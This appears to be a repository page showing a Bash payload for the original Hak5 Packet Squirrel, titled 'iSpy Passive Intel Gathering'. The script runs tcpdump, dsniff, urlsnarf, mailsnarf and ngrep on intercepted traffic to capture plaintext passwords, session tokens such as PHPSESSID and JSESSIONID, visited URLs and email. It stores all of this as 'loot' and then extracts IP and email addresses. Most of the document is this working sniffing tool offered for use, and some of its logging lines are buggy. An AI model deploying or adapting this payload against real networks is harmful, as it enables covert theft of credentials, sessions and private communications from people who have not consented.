HAK5/packetsquirrel-payloads
1
0
Fork 0
mirror of https://github.com/hak5/packetsquirrel-payloads.git synced 2025-12-19 09:48:47 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
d3250b4165bbc20dc737fc4d94e2cccd4b3cd2a1
packetsquirrel-payloads/legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh
Mike Kershaw / Dragorn d3250b4165 Update repos for Packet Squirrel Mk 2 release
2023-07-24 14:58:18 -04:00

188 lines
5.1 KiB
Bash
Raw Blame History

#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: iSpy Passive Intel Gathering
# Description: Launches various tools to sniff out intel data.
# Payload will run until the button is pressed.
# Author: infoskirmish.com
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: Any (default: Transparent)
# LEDs
# SUCCESS: Payload ended complete
# FAIL: No USB storage found
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="lo" # Interface to listen on
Date=$(date +%Y-%m-%d-%H%M) # Date format to use for log files
dsnifflog="dsniff_$Date.log" # DSNiff log file name
urlsnifflog="urlsnarf_$Date.log" # URLSniff log file name
tcpdumplog="tcpdump_$Date.pcap" # TCPDump log file name
httppwdlog="httpPasswords_$Date.pcap" # Potential HTTP password file name
sessionidlog="sessionids_$Date.pcap" # Potential Session IDs file name
mailsnarfLog="mailsnarf_$Date.log" # Mailsnarf data log file path.
function monitor_space() {
while true
do
[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill URLSnarff
echo "URLSnarff ending pid=$1" >> $1/log.txt
kill $1
wait $1
# Kill DNSniff
echo "DNSniff ending pid=$2" >> $2/log.txt
kill $2
wait $2
# Kill TCPDump
echo "TCPDump ending pid=$3" >> $3/log.txt
kill $3
wait $3
# Kill HTTP Password NGREP
echo "HTTP Password NGREP ending pid=$4" >> $4/log.txt
kill $4
wait $4
# Kill Session NGREP
echo "HTTP Session NGREP ending pid=$5" >> $5/log.txt
kill $5
wait $5
# Kill Mail Snarf
echo "Mail Snarf ending pid=$6" >> $6/log.txt
kill $6
wait $6
# I found that if this payload had been running awhile the next two steps may take a bit. It is useful to have some kind of indication
# that the payload accepted your button push and is responding. Thus the rapid white blink.
LED W VERYFAST
# Dump all unique IP address from TCP Dump file.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort | uniq >> $lootPath/ipv4found_$Date.txt
# Ok this is a really stupid grep pattern matching to search for emails; it is meant to give an over view of what is possible.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -Eiv "[\.]{2}" | grep -oE "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort | uniq >> $lootPath/maybeEmails_$Date.txt
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system; turn off LED
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p $lootPath &> /dev/null
# Start tcpdump on the specified interface
tcpdump -i $interface -w $lootPath/$tcpdumplog &>/dev/null &
tpid=$!
# Log TCP Dump Start
echo "TCPDump started pid=$tpid" >> $lootPath/log.txt
# Start urlsnarff on the specified interface
urlsnarf -n -i $interface >> $lootPath/$urlsnifflog &
urlid=$!
# Log URL Snarff Start
echo "URLSnarf started pid=$urlid" >> $lootPath/log.txt
# Start dsniff on the specified interface
dsniff -c -m -i $interface -w $lootPath/$dsnifflog &
dsniffid=$!
# Log DSNiff Start
echo "DSNiff started pid=$dsniffid" >> $lootPath/log.txt
# Log potential plain text user names and passwords on port 80 and 21
# The thing is port 21 is the defult ftp port. Passwords and user names are exchanged in clear text!!!
ngrep -d $interface -i "user_pass|userid|pass|pwd|password|login|user_login|usr|USER" -W byline port 80 or port 21 -O $lootPath/$httppwdlog &
pwdgrep=$!
# Log Password NGREP Start
echo "Password NGREP started pid=$pwdgrep" >> $lootPath/log.txt
# Log potential plain text session ids, tokens, etc.
ngrep -d $interface -i "session|sessid|token|loggedin|PHPSESSID|CFTOKEN|CFID|JSESSIONID|sessionid" -W byline port 80 or port 21 -O $lootPath/$sessionidlog &
sessiongrep=$!
# Log Session NGREP Start
echo "Session NGREP started pid=$sessiongrep" >> $lootPath/log.txt
# Log mailsnarf data
mailsnarf -i $interface $lootPath/$mailsnarflog &
mailsnarfid=$!
# Log mailsnarf Start.
echo "Mailsnarf started pid=$mailsnarfid" >> $lootPath/log.txt
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $urlid $dsniffid $tpid $pwdgrep $sessiongrep $mailsnarfid
}
# This payload will only run if we have USB storage
if [ -d "/mnt/loot" ]; then
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE $mode >> $lootPath/log.txt
sleep 5
# Lets make sure the interface the user wanted actually exisits.
if [[ $(ifconfig |grep $interface) ]]; then
echo "" > $lootPath/log.txt
LED ATTACK
run &
monitor_space $! &
else
# Interface could not be found; log it in ~/payload/switch1/log.txt
ifconfig > $lootPath/log.txt
echo "Could not load interface $interface. Stopping..." >> $lootPath/log.txt
# Display FAIL LED
LED FAIL
fi
else
# USB storage could not be found; log it in ~/payload/switch1/log.txt
echo "Could not load USB storage. Stopping..." > log.txt
# Display FAIL LED
LED FAIL
fi
Reference in New Issue View Git Blame Copy Permalink